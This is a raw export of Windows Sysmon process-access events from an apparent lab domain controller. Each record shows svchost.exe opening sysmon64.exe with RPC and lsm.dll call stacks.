12:01:01.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 